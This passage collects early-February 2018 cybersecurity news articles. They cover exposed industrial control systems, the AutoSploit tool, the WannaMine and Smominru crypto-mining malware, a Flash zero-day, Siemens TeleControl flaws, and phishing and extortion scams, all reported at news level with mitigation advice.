Of all the systems identified in 2017, more than 66,000 were accessible via HTTP, followed by the Fox building automation protocol associated with Honeywell’s Niagara framework (39,000), Ethernet/IP (25,000), BACnet (13,000), and the Lantronix discovery protocol (10,000).

The highest percentage of exposed devices, representing 42% of the total, was spotted in the United States. The number of Internet-accessible ICS components in the U.S. increased by 10% compared to 2016, from roughly 50,000 to 64,000. The U.S. is followed at a distance by Germany (13,000 accessible systems), France (7,000), and Canada (7,000).

Many of the industrial systems connected to the Web come from Honeywell (26,000), Lantronix (12,000), SMA (9,000), Beck IPC (9,000), Siemens (6,000) and Rockwell Automation (5,000).

The distribution of Internet-exposed components by type has remained largely the same compared to 2016. Types of ICS components exposed to the Internet

John Matherly, CEO of the search engine Shodan, has confirmed for SecurityWeek that there has been an increase of roughly 10% year-over-year in terms of ICS exposure on the Internet.

“The increase is mostly in building automation protocols and despite the news coverage we haven't seen any decrease in devices,” Matherly said.

According to Positive Technologies, a total of nearly 200 new vulnerabilities were disclosed in 2017, compared to 115 in 2016. Worryingly, 61% of the flaws whose existence was made public last year were rated critical and high severity.

The most common types of vulnerabilities were remote code execution (24%), information disclosure (17%), and buffer overflows (12%). “Most vulnerabilities detected in 2017 can be exploited remotely without needing to obtain any privileges in advance,” Positive Technologies said in its report.

A report published in October by CyberX revealed that one-third of industrial and critical infrastructure systems had been connected to the Internet, based on data obtained by the industrial security firm by passively monitoring traffic from hundreds of operational technology (OT) networks.

AutoSploit: Automated Hacking Tool Set to Wreak Havoc or a Tempest in a Teapot?
2.2.2018 securityweek

AutoSploit Automatically Finds Vulnerable Targets via Shodan and Uses Metasploit Exploits to Compromise Hosts

AutoSploit is a tool designed to automate the use of Metasploit exploits. It was announced on Twitter on Wednesday.

"I just released AutoSploit on #Github. #Python based mass #exploit #tool. Gathers targets via #Shodan and automatically invokes selected #Metasploit modules to facilitate #RCE," announced Twitter user VectorSEC, Wednesday. Just to be clear, this tool automatically finds vulnerable targets and uses Metasploit exploits to provide remote code execution for the user.

No great skill is necessary: all that is required is AutoSploit (available from GitHub), Python Blessings, Shodan, and Metasploit. Shodan locates the targets, Metasploit provides the exploits, and AutoSploit actions them. Since new vulnerability exploits are added to Metasploit faster than many companies can apply vulnerability patches, the immediate concern is whether this new tool will further commoditize cybercrime by facilitating a new army of unskilled, wannabee, skiddie, hackers able to hack computers automatically.

Just how dangerous is this? Opinions are varied. "[AutoSploit] makes being a script kiddie infinitely easier," comments Chris Morales, head of security analytics at Vectra Networks. "It is combining a whole set of automated tools for identifying exposed hosts and then executing exploits. Where I think this will have the most dramatic effect, and what scares me most, is with IoT. I’m predicting a rash of new IoT DOS, cryptocurrency mining, and general debauchery."

But he notes that it will simply lead to a compromised host -- something security teams have to handle every day. There is still time for incident response. "We cannot rely on prevention and need to be vigilant in finding attackers once they infect systems and before they can cause real damage.”

Chris Roberts, chief security architect at Acalvio, agrees that it will attract the wannabees. “Good to know we’ve weaponized for the masses. Everyone can now be a script kiddie simply by plugging, playing and attacking." But he points out that attack tools with 'very nice interfaces' are not new, and only exist because the root problem is the bad products, code, systems and infrastructures used by everyone.

"The kids are not more dangerous," he says. "They already were dangerous. We’ve simply given them a newer, simpler, shinier way to exploit everything that’s broken. Maybe we should fix the ROOT problem.”

"The basic functionalities [of AutoSploit] were already accessible," says ESET senior research fellow, David Harley, "but AutoSploit lowers the level of knowledge and competence necessary to take advantage of them. So, I guess there could be more skiddies snapping at the heels of companies and individuals whose patching isn’t up to scratch."

He warns that companies cannot rely on prevention technologies to neutralize AutoSploit. "Security companies watch Metasploit with the intention of remediating where they can, so some (at least) of the modules used will be less effective on well-protected systems. Sadly, not every exploit can be 100% defended against by third-party security software. Not every system out there is well-protected. And it sounds as if AutoSploit will make it easier to find and probe systems that are less likely to be properly patched or defended with security software. Like the Internet-of-unnecessarily-interconnected-things…"

AutoSploit Hacking Tool

There are others who simply dismiss AutoSploit. Jerry Gamblin, lead security analyst at Carfax, tweeted, "While everyone is freaking out I hacked together antiautosploit to stop autosploit from sploiting you (This just blocks Shodan from scanning you)."

The general consensus from the security industry seems to be that AutoSploit will attract the kiddies but won't change the current threat landscape -- beyond perhaps making existing good practice (patching, incident response) more important and urgent.

"This doesn't really change anything from way things are already," says F-Secure principal researcher Jarno Niemela. "My 11-year-old son learned Metasploit when he was 10 years old, and there is a ton of tradecraft videos in YouTube for anyone who is interested... This tool simply makes something that was already very easy just a bit easier."

But he also has a word of warning for wannabees attracted by AutoSploit. "The fact that something is really easy, does not make unauthorized computer access any less a crime. And tools like this leave a forensic footprint that is miles wide. Yes, you can compromise poorly protected systems very easily with this tool, but you can also end up in a lot of trouble."

Legacy Malware and Legacy Systems Are Not a Legacy Problem
2.2.2018 securityweek
Companies must be wary of chasing shiny new threats with shiny new defenses, while leaving legacy systems vulnerable to legacy malware.

Trend Micro calls the legacy threat 'Throwhack'; after the more benign 'Throwback Thursday' social media trend; but, says principal security strategist Bharat Mistry in a blog published today, "there’s nothing entertaining about this list of legacy security challenges."

Mistry points to Conficker (dating back to 2008). "Throughout 2017 we saw monthly detections of around 20,000; meaning it’s still highly active." In conversation with SecurityWeek, he agreed that the majority of detections were in the Far East with few appearing in the U.S. or Europe; but warned that Far East breaches could get into the supply chain of Western organizations.

Heartbleed is another old threat that hasn't gone away. "Despite surfacing and being patched in 2014, nearly 200,000 servers and devices were reported as exposed last year."

The problem goes deeper than just old malware -- it is exacerbated by the continued use of old and unsupported systems. "Spiceworks has claimed that 68% of US, Canadian and US firms still run Office 2007, while it has also been reported that around 20% of US and UK healthcare organizations still run Windows XP. It doesn’t take much to understand the dangers of running unsupported systems," he writes.

One of the problems, he told SecurityWeek, is that new security products are not always old problem aware. "Machine learning systems," he said, "often 'learn' to detect malware based on current threats. They simply aren't taught to detect old behaviors; and can miss them."

To be fair, he isn't advocating abandoning new machine learning detection products or methods, only pointing out that on their own they aren't enough. "Wherever possible," he said, "organizations should employ traditional anti-malware products as well as new machine learning products." He added that the challenge of the smaller processing overhead from ML systems has spurred traditional anti-malware into designing and implementing new approaches that reduce their own overhead.

Nevertheless, he stresses that one of the best solutions to legacy malware is to update or upgrade legacy systems: newer versions of old operating systems are no longer susceptible to old vulnerabilities.

"If updating your OS is not possible, for whatever reason, use vulnerability shielding/virtual patching on the endpoint or intrusion prevention at the network level. It’s ideal for mitigating the impact of older malware like Conficker which exploits vulnerabilities. It protects legacy systems by providing convenient and automatic updates, allowing organizations to maintain protection while minimizing their patch management costs."

South Korea Warns of Flash Zero-Day Exploited by North Korea
2.2.2018 securityweek BigBrothers
South Korea’s Internet & Security Agency (KISA) has issued an alert for a zero-day vulnerability in Flash Player that has reportedly been exploited in attacks by North Korean hackers.

Few details have been provided, but KISA says the vulnerability affects Flash Player and earlier. Version is the latest, released by Adobe in January as part of the Patch Tuesday updates.

The security hole can be exploited by getting a user to open a document, web page or email containing a specially crafted Flash file, KISA said on Wednesday.

Simon Choi of South Korea-based cybersecurity firm Hauri said on Twitter the Flash Player zero-day has been exploited by North Korea since mid-November 2017 in attacks aimed at South Korean individuals who focus on researching North Korea.

According to the expert, the flaw has been leveraged to distribute malware. A screenshot he posted appears to show that the exploit has been delivered via malicious Microsoft Excel files.
Flash zero-day exploited by North Korea - credits: Simon Choi (@issuemakerslab)

Flash zero-day exploited by North Korea - credits: Simon Choi (@issuemakerslab)

SecurityWeek has reached out to Adobe for comment and will update this article once the company responds. Since the activities of North Korean threat actors have been closely monitored by several security firms, it’s possible that Adobe has already been made aware of the zero-day and is working on a patch.

UPDATE. Adobe says it's aware of a report that an exploit for a vulnerability it tracks as CVE-2018-4878 exists in the wild, and is being used in limited, targeted attacks against Windows users. The company says it will address the flaw with an update planned for the week of February 5.

In an advisory, Adobe said the vulnerability is a critical use-after-free that allows remote code execution. Until a patch becomes available, the company has provided some mitigations.

"Beginning with Flash Player 27, administrators have the ability to change Flash Player's behavior when running on Internet Explorer on Windows 7 and below by prompting the user before playing SWF content," Adobe said. "Administrators may also consider implementing Protected View for Office. Protected View opens a file marked as potentially unsafe in Read-only mode."

Kaspersky Launches New Security Product for Exchange Online
2.2.2018 securityweek Safety
Kaspersky Lab has expanded its small and medium-sized business (SMB) offering with a new cloud-based product designed to provide an extra layer of security for the Exchange Online email service in Microsoft Office 365.

The new product, Kaspersky Security for Microsoft Office 365, is designed to protect users against malware, phishing, spam, and other email-borne threats.

Exchange Online includes built-in anti-malware and anti-spam features, but Kaspersky says its own product – part of the company’s Business Hub offering – works in conjunction with Microsoft’s protections and offers native integration.

Kaspersky says its product relies on various security technologies, including machine learning-based detection, an anti-phishing engine that uses neural networks, sandboxing, attachment filtering mechanisms, and data from the company’s threat intelligence network.

The new product analyzes incoming emails and places suspicious messages in quarantine. Administrators are informed of the potential threats via a central console shared with the Kaspersky Endpoint Security Cloud product. The console allows customers to view each potentially malicious email and restore them in case of false positives.

According to the security firm, Kaspersky Security for Microsoft Office 365 is capable of recognizing if a file attached to an email is the type it claims to be, and it can detect malicious macros hidden in harmless-looking Office documents.

Kaspersky launches new security product for Exchange Online

Since there has been a lot of debate recently on the implications of the physical location of data stored in the cloud, Kaspersky allows users to specify which data center they want to use for processing emails.

Furthermore, given the recent controversy regarding the company uploading sensitive files from an NSA contractor’s computer to its own servers, Kaspersky has highlighted that the new product does not upload any files to its systems. Instead, quarantined emails are stored in the customer’s Exchange Online account.

Watch out, cyber criminals are using fake FBI emails to infect your computer
2.2.2018 securityaffairs BigBrothers

The FBI Internet Crime Complaint Center (IC3) is warning of a new malware campaign aimed at infecting victims with weaponized attachments.
The Feds’ Internet Crime Complaint Center (IC3) is warning of a new spam campaign aimed at infecting victims with a ransomware. According to an alert issued on Wednesday by the IC3, numerous citizens filled complaints after received emails purporting to be from IC3. The message pretends to be the compensation from a cyber attack and asks the victims to fill the attached document, but the file is laced with malware.

The story is interesting, the email reports that a Nigerian cyber criminal had been arrested and feds have found the recipient’s email address of the alleged scammer’s PC. The email asks victims to return the document with recipient info and wait for the refund to arrive. Once the victim has opened the document, the infection process will start.


The FBI has identified at least three other versions of the IC3 impersonation scam:

“The first involved a fake IC3 social media page, which advertised itself as the FBI Cyber Crime Department (IC3) and requested recipients provide personal information in order to report an internet crime.” states the alert issued by the FBI. “
“The second involved an email which stated the recipient was treated unfairly by various banks and courier companies. The email claimed the recipient’s name was found in a financial company’s database and that they will be compensated for this unfair treatment.”
“The third example involved an email from the Internet Crime Investigation Center/Cyber Division and provided an address in Minneapolis, Minnesota. The email also included a case reference number in the subject line. The email informed the recipient that their IP address was referred to the IC3 as a possible victim of a federal cyber-crime. The email then requests the recipient to contact the sender via telephone.”
FBI is currently investigating the cases, victims of an online scam can file a complaint with the IC3 at

WannaMine, the sophisticated crypto miner that spreads via NSA EternalBlue exploit
2.2.2018 securityaffairs

Researchers from security firm CrowdStrike spotted a new Monero crypto-mining worm dubbed WannaMine that spreads leveraging the NSA-linked EternalBlue exploit.
This morning I wrote about the Smominru botnet that used NSA exploit to infect more than 526,000 systems, and I explained that other threat actors are using similar techniques to mine cryptocurrency.

This is the case of a strain of the Monero crypto-mining worm dubbed WannaMine that spreads leveraging the EternalBlue exploit.

ETERNALBLUE is the alleged NSA exploit that made the headlines with DOUBLEPULSAR in the WannaCry attack, it targets the SMBv1 protocol and has become widely adopted in the community of malware developers.

In June, following the WannaCry attacks experts discovered that there were at least other 3 different groups have been leveraging the NSA EternalBlue exploit,

Back to the present, WannaMine was developed to mine the Monero cryptocurrency abusing victims’ resources. According to security researchers at CrowdStrike, the malicious code is very sophisticated, it implements a spreading mechanism and persistence model similar to those used by state-sponsored APT groups.

“CrowdStrike has recently seen several cases where mining has impacted business operations, rendering some companies unable to operate for days and weeks at a time. The tools have caused systems and applications to crash due to such high CPU utilization speeds.” reads the analysis published by CrowdStrike.

“CrowdStrike has observed more sophisticated capabilities built into a cryptomining worm dubbed WannaMine. This tool leverages persistence mechanisms and propagation techniques similar to those used by nation-state actors, demonstrating a trend highlighted in the recent CrowdStrike Cyber Intrusion Services Casebook 2017, which states that “contemporary attacks continue to blur the lines between nation-state and eCrime tactics.”

WannaMine is a fileless that was first reported by researchers at Panda Security.


The malicious code implements so-called “living off the land” techniques to gain persistence on the infected system leveraging Windows Management Instrumentation (WMI) permanent event subscriptions. WannaMine registers a permanent event subscription that would execute every 90 minutes a PowerShell command located in the Event Consumer.

Experts noticed that the malware uses credential harvester Mimikatz to collect users’ credentials that could be used for lateral movements. It also relies on the EternalBlue exploit in case it is not able to move laterally with the above technique.

WannaMine is able to infect systems running all Windows versions starting with Windows 2000, including 64-bit versions and Windows Server 2003.

“While the tactics, techniques, and procedures (TTPs) displayed in WannaMine did not require a high degree of sophistication, the attack clearly stands on the shoulders of more innovative and enterprising nation-state and eCrime threat actors. CrowdStrike anticipates that these threat actors will continue to evolve their capabilities to go undetected,” CrowdStrike concluded.

WannaMine would degrade the performance of the infected machines, in case of laptops the malicious code could cause damages if it runs continuously for several hours.

Sophos experts published an interesting post containing Q&A on WannaMine.

WannaMine Malware Spreads via NSA-Linked Exploit
1.2.2018 securityweek
Virus  Exploit
A piece of crypto-mining malware is using sophisticated tools for its operations, including a Windows exploit linked to the National Security Agency, security researchers warn.

Dubbed WannaMine, the crypto-mining worm spreads using EternalBlue, the NSA-linked tool that became public in April 2017, just one month after Microsoft released a patch for it.

Leveraging a vulnerability in Windows’ Server Message Block (SMB) on port 445, the exploit became famous after the WannaCry ransomware was found exploiting it for distribution. Other malware families abused it as well, including botnets, backdoors, NotPetya, and banking Trojans.

Now, the same exploit is being used to spread WannaMine, a piece of malware focused on mining for the Monero crypto-currency, but which uses sophisticated capabilities, such as persistence and distribution mechanisms similar to those used by nation-state actors, CrowdStrike says.

WannaMine, the security researchers explain, employs “living off the land” techniques for persistence, such as Windows Management Instrumentation (WMI) permanent event subscriptions. The malware has a fileless nature, leveraging PowerShell for infection, which makes it difficult to block without the appropriate security tools.

The malware uses credential harvester Mimikatz to acquire legitimate credentials that would allow it to propagate and move laterally. If that fails, however, the worm attempts to exploit the remote system via EternalBlue.

To achieve persistence, WannaMine sets a permanent event subscription that would execute a PowerShell command located in the Event Consumer every 90 minutes.

The malware targets all Windows versions starting with Windows 2000, including 64-bit versions and Windows Server 2003. However, it uses different files and commands for Windows Vista and newer platform iterations.

“While the tactics, techniques, and procedures (TTPs) displayed in WannaMine did not require a high degree of sophistication, the attack clearly stands on the shoulders of more innovative and enterprising nation-state and eCrime threat actors. CrowdStrike anticipates that these threat actors will continue to evolve their capabilities to go undetected,” the security company notes.

As Sophos points out, organizations that find the WannaMine malware in their network are also at risk of other malware, including ransomware. It is not uncommon to find multiple malware families on machines that have been compromised once.

Designed to mine for Monero, not to steal user information or crypto-coins, WannaMine would still slow down the infected machines. Laptops could even be damaged, if the malware runs on them continuously for several hours, as the device gets hotter. Also, the battery is drained faster than usual, Sophos points out.

An antivirus application should keep users protected from this malware family. Keeping systems up to date at all times and using strong passwords should also help avoiding a WannaMine infection.

Google Adds Custom Roles Feature to Cloud IAM
1.2.2018 securityweek IT
The Identity & Access Management (IAM) service in the Google Cloud Platform (GCP) now includes a feature that allows users to assign custom roles for finer-grained security.

The custom roles feature was first announced back in October when the beta version was introduced. The tech giant announced on Wednesday that nearly all permissions can now be customized.

Granting users excessive privileges to services, applications and data can introduce serious security risks, which is why it’s crucial for administrators to ensure that users only have the permissions needed to perform their jobs.

Customers of Google’s cloud platform now have full control over more than 1,200 public permissions, providing them fine-grained access control for enforcing the principle of least privilege. The principle of least privilege is a concept that promotes minimal user profile privileges based on job necessities.

In the case of GCP, administrators can rely on the IAM service to assign a predefined role to users - for example, allow them to view or modify data stored in the cloud. However, these predefined roles are sometimes not enough for implementing the principle of least privilege.

Custom roles, on the other hand, can be used to remix permissions across all services to ensure that users do not receive privileges other than ones required to do their job.

“Consider a tool that needs access to multiple GCP services to inventory Cloud Storage buckets, BigQuery tables and Cloud Spanner databases. Enumerating data doesn’t require privileges to decrypt that data. While predefined roles to view an entire project may grant .query,.decrypt and .get as a set, custom roles make it possible to grant .get permission on its own,” Google’s Rohit Khare and Pradeep Madhavarapu explained in a blog post.

Except for certain permissions that are only supported in predefined roles, all permissions are now customizable. A list of all supported permissions has been made available and users can keep track of changes via a central change log.

In the future, Google wants to further enhance its IAM service, including by using research from the company’s Forseti open source initiative to help explain why a specific permission has been granted or denied.

Siemens fixed three flaws in plant management product Siemens TeleControl Basic system
1.2.2018 securityaffairs

Siemens has patched three security vulnerabilities in its Plant Management Product, the Siemens TeleControl Basic system.
The system is used in water treatment facilities, traffic monitoring systems, and energy distribution plants. The TeleControl Basic control center runs the TeleControl Server Basic software. The Siemens TeleControl Basic system allows organizations to monitor and control processes in industrial environment and operation of municipal facilities.

The TeleControl Server Basic system is affected by three vulnerabilities that could be exploited by an attacker to conduct different types of attacks, including privilege escalation, bypass authentication, and denial-of-service (DoS) attacks.

“The latest update for TeleControl Server Basic resolves three vulnerabilities. One of these vulnerabilities could allow an authenticated attacker with network access to escalate his privileges and perform administrative actions.” reads the security advisory published by Siemens.

“Siemens recommends updating to the new version.”

This is the first time that Siemens publishes a security advisory released by Siemens and ICS-CERT for a vulnerability that affects TeleControl products

The flaws affect TeleControl Server Basic versions prior to V3.1, the most severe one is tracked as CVE-2018-4836 and rated high severity.

Below the list of the vulnerabilities and related descriptions:

Vulnerability (CVE-2018-4835) [CVSS v3.0 Base Score 5.3] – It could be exploited by an attacker with network access to the TeleControl Server Basic’s port 8000/tcp to bypass the authentication mechanism and access limited information.
Vulnerability (CVE-2018-4836) [CVSS v3.0 Base Score 8.8] – It could be exploited by an authenticated attacker with a low-privileged account to the TeleControl Server Basic’s port 8000/tcp to escalate privileges and perform administrative operations.
Vulnerability (CVE-2018-4837) [CVSS v3.0 Base Score 5.3] – It could be exploited by an attacker with access to the TeleControl Server Basic’s webserver (port 80/tcp or 443/tcp) to cause a DoS condition on the web server.
Siemens also provided some workarounds to mitigate the risk of attacks, including the blocking of TCP port 8000 through the Windows firewall for both CVE-2018-4835, CVE-2018-4836 and the blocking of the ports 80 and 443 for the CVE-2018-4837.

The US ICS-CERT also published a detailed advisory for the vulnerabilities in the Siemens TeleControl Basic.

Cryptocurrency Mining Malware Infected Over Half-Million PCs Using NSA Exploit
1.2.2018 thehackernews

2017 was the year of high profile data breaches and ransomware attacks, but from the beginning of this year, we are noticing a faster-paced shift in the cyber threat landscape, as cryptocurrency-related malware is becoming a popular and profitable choice of cyber criminals.
Several cybersecurity firms are reporting of new cryptocurrency mining viruses that are being spread using EternalBlue—the same NSA exploit that was leaked by the hacking group Shadow Brokers and responsible for the devastating widespread ransomware threat WannaCry.
Researchers from Proofpoint discovered a massive global botnet dubbed "Smominru," a.k.a Ismo, that is using EternalBlue SMB exploit (CVE-2017-0144) to infect Windows computers to secretly mine Monero cryptocurrency, worth millions of dollars, for its master.
Active since at least May 2017, Smominru botnet has already infected more than 526,000 Windows computers, most of which are believed to be servers running unpatched versions of Windows, according to the researchers.
"Based on the hash power associated with the Monero payment address for this operation, it appeared that this botnet was likely twice the size of Adylkuzz," the researchers said.
The botnet operators have already mined approximately 8,900 Monero, valued at up to $3.6 million, at the rate of roughly 24 Monero per day ($8,500) by stealing computing resources of millions of systems.

The highest number of Smominru infection has been observed in Russia, India, and Taiwan, the researchers said.
The command and control infrastructure of Smominru botnet is hosted on DDoS protection service SharkTech, which was notified of the abuse but the firm reportedly ignored the abuse notifications.
According to the Proofpoint researchers, cybercriminals are using at least 25 machines to scan the internet to find vulnerable Windows computers and also using leaked NSA's RDP protocol exploit, EsteemAudit (CVE-2017-0176), for infection.
"As Bitcoin has become prohibitively resource-intensive to mine outside of dedicated mining farms, interest in Monero has increased dramatically. While Monero can no longer be mined effectively on desktop computers, a distributed botnet like that described here can prove quite lucrative for its operators," the researchers concluded.
"The operators of this botnet are persistent, use all available exploits to expand their botnet, and have found multiple ways to recover after sinkhole operations. Given the significant profits available to the botnet operators and the resilience of the botnet and its infrastructure, we expect these activities to continue, along with their potential impacts on infected nodes."
Another security firm CrowdStrike recently published a blog post, reporting another widespread cryptocurrency fileless malware, dubbed WannaMine, using EternalBlue exploit to infect computers to mine Monero cryptocurrency.
Since it does not download any application to an infected computer, WannaMine infections are harder to detect by antivirus programs. CrowdStrike researchers observed the malware has rendered "some companies unable to operate for days and weeks at a time."
Besides infecting systems, cybercriminals are also widely adopting cryptojacking attacks, wherein browser-based JavaScript miners utilise website visitors' CPUs power to mine cryptocurrencies for monetisation.
Since recently observed cryptocurrency mining malware attacks have been found leveraging EternalBlue, which had already been patched by Microsoft last year, users are advised to keep their systems and software updated to avoid being a victim of such threats.

Siemens Patches Flaws in Plant Management Product
1.2.2018 securityweek 
Siemens has informed customers that a component of its TeleControl Basic product is affected by several vulnerabilities that can be exploited by an attacker to escalate privileges, bypass authentication, and launch denial-of-service (DoS) attacks.

Siemens’ TeleControl Basic system allows organizations to monitor and control plant processes. The solution can also be used to optimize the operation of municipal facilities, including water treatment, traffic monitoring, and energy distribution. TeleControl Server Basic is the software used for the TeleControl Basic control center.

According to advisories published by Siemens and ICS-CERT, the TeleControl Server Basic system is affected by a total of three vulnerabilities. The most serious of them, tracked as CVE-2018-4836 and rated high severity, allows an attacker with a low privileged account and access to TCP port 8000 to escalate privileges and perform administrative tasks.

Another flaw, CVE-2018-4835, allows an attacker with network access to port 8000 to bypass the system’s authentication mechanism and obtain limited information.

The last security hole, CVE-2018-4837, can be exploited by an attacker with access to the TeleControl web server on TCP ports 80 or 443 to cause the web server to enter a DoS condition. However, Siemens pointed out that the DoS condition does not affect other functionality.

CVE-2018-4835 and CVE-2018-4837 have been classified as medium severity with a CVSS score of 5.3.

Siemens has patched the vulnerabilities with the release of TeleControl Server Basic 3.1. In addition, the company has identified some workarounds and mitigations that can be used to reduce the risk of attacks.

These include blocking TCP port 8000 using the Windows firewall to mitigate CVE-2018-4835 and CVE-2018-4836, and blocking ports 80 and 443 to prevent attacks involving CVE-2018-4837.

While this is the first advisory released by Siemens and ICS-CERT for a vulnerability specific to TeleControl products, a privilege escalation flaw disclosed in November 2016 had been found to impact TeleControl Server Basic – among many other industrial solutions from Siemens. That security hole was addressed in TeleControl Server Basic with the release of version 3.0.

Mining Smominru botnet used NSA exploit to infect more than 526,000 systems
1.2.2018 securityaffairs BigBrothers

Researchers from Proofpoint discovered a huge botnet dubbed ‘Smominru’ that is using the EternalBlue exploit to infect Windows computers and recruit them in Monero cryptocurrency mining activities.
The number of cyber attacks against the cryptocurrency sector continues, vxers are focusing their efforts on the development of cryptocurrency/miner malware.

Recently security experts observed cryptocurrency miners leveraging the NSA EternalBlue SMB exploit (CVE-2017-0144) as spreading mechanism.

On August 2017, a new fileless miner dubbed CoinMiner appeared in the wild, it uses NSA EternalBlue exploit and WMI tool to spread.

Now researchers Researchers from Proofpoint discovered a huge botnet dubbed ‘Smominru’ (aka Ismo) that is using the EternalBlue exploit (CVE-2017-0144) to infect Windows computers and recruit them in Monero cryptocurrency mining activities.

” Because obtaining these cryptocurrencies through legitimate mining mechanisms is quite resource-intensive, cybercriminals are stealing them, demanding ransomware payments in them, and harnessing other computers to mine them for free. Recently, Proofpoint researchers have been tracking the massive Smominru botnet, the combined computing power of which had earned millions of dollars for its operators.” states the analysis published by Proofpoint

With the help of Abuse.CH and the ShadowServer Foundation, Proofpoint conducted a sinkholing operation that allowed to profile the botnet.

The command and control infrastructure of the Smominru botnet is hosted on DDoS protection service SharkTech, Proofpoint promptly notified the abuse to the service provider without receiving any response.

According to the researchers, the Smominru botnet has been active at least since May 2017 and has already infected more than 526,000 Windows computers.

Most of the infected systems are servers distributed worldwide, most of them in Russia, India, and Taiwan. It is a profitable business, the operators had already mined approximately 8,900 Monero ($2,346,271 at the current rate).
“Based on the hash power associated with the Monero payment address for this operation, it appeared that this botnet was likely twice the size of Adylkuzz,” the researchers said. “The operators had already mined approximately 8,900 Monero (valued this week between $2.8M and $3.6M). Each day, the botnet mined roughly 24 Monero, worth an average of $8,500 this week (Figure 2).”

smominru botnet

The researchers at Proofpoint discovered that crooks are using at least 25 hosts to scan the Internet for EternalBlue vulnerable Windows computers and also leveraging the NSA EsteemAudit (CVE-2017-0176) for compromising the target machines.

The machines all appear to sit behind the network autonomous system AS63199, further technical details and the IoCs are included in the analysis published by Proofpoint.

“Because most of the nodes in this botnet appear to be Windows servers, the performance impact on potentially critical business infrastructure may be high, as can the cost of increased energy usage by servers running much closer to capacity. The operators of this botnet are persistent, use all available exploits to expand their botnet, and have found multiple ways to recover after sinkhole operations.” concluded the Proofpoint.

“Given the significant profits available to the botnet operators and the resilience of the botnet and its infrastructure, we expect these activities to continue, along with their potential impacts on infected nodes. We also expect botnets like that described here to become more common and to continue growing in size.”

Every little bitcoin helps
1.2.2018 Kaspersky 
It often happens that inventions and technologies that start out good end up turning into dangerous tools in the hands of criminals. Blockchain is no exception to this rule, especially in its most common cryptocurrency incarnation. Cryptocurrencies crop up in all kinds of spam: from traditional advertising (courses about investment and trade) to more fraudulent and malicious varieties. Quite often, cryptocurrencies are used by attackers as originally intended — as a means of payment (albeit from victims). We found and delved into several spam mailings in which cybercrooks exploited user paranoia about information threats and took bitcoins as payment for peace of mind. The attacks targeted employees of small companies, but such emails could be sent to any user’s personal mail.

In the first email, the attacker claimed to have installed malware on a porn site visited by the victim, and to be in possession of several videos recorded from both the device screen and cameras; not only that, a keylogger had supposedly provided access to the user’s IM, email, and social media contacts. To get the attacker off their back, the victim was asked to transfer the equivalent of $320 to the bitcoin wallet specified in the email. It was also mentioned that a built-in tracking pixel would inform the attacker that the email had been seen. And if the recipient wanted proof of that, they should reply to the message, whereupon the compromising info would be sent out to five of their contacts. As a postscript, the scammer warned against going to the police: he allegedly lived in Belarus, so the investigation would drag on for years.

The next email was wordy but imaginative, written by a hacker by the name of Andrey. The attacker informed the recipient that he had studied the latter’s company, together with its employees and their relatives, found weaknesses, and was planning to ruin it. The author listed no fewer than seven ways to achieve this goal, from simply writing negative reviews on various websites to creating fake company reports in his garage(!) and sending them to government departments. However, the hacker’s preferred outcome was for the company to see sense and transfer 3 bitcoins to his wallet. Like the previous email, it specifically mentioned not going to the cops, since “Andrey” lived in Ukraine.

Another email was the work of not one hacker, but an entire chain gang. The attackers allegedly had hacked the company’s server and got hold of information about its clients, bank accounts, tax payments, etc. Now they were threatening to damage the company’s reputation by publishing this information online. It was also stated that at some unspecified moment they would launch an attack on the company’s servers and computers, encrypting all data. To call off the attack, the blackmailers demanded 0.5 bitcoin. If the cryptopayment was not made before the start of the attack, the amount would rise to 2 bitcoins.

Sadly and (perhaps) surprisingly, some people still fall for such concoctions. The targets of these mailings are usually small companies that lack the resources for decent anti-spam protection and basic information security training for staff. So let us reiterate: be vigilant, stay calm, and take anonymous threats of this kind with a pinch of salt.

Cybercriminals target early IRS 2018 refunds now

1.2.2018 Kaspersky CyberCrime
Where is my tax refund? Wait! What are that fraud charges on my credit card??
On Monday, Jan 29th, IRS officially opened its 2018 season. Some taxpayers already filed their taxes and cybercriminals know it too. So, right after two days of the official 2018 season opening, we got phishing messages with a fake refund status Websites:

The link in the email leads to a hacked Brazilian restaurant, redirecting to Website with Australian domain zone.

So, the whole scheme is to steal credit card information of the taxpayers expecting a tax refund from IRS. Both URLs are blocked by Kaspersky Anti-Phishing now.

The mentioned Website was hacked and includes an old Webshell uploaded back to 2016.

Should we expect more campaigns like this? Definitely yes. Stay watchful and don’t lose your refunds!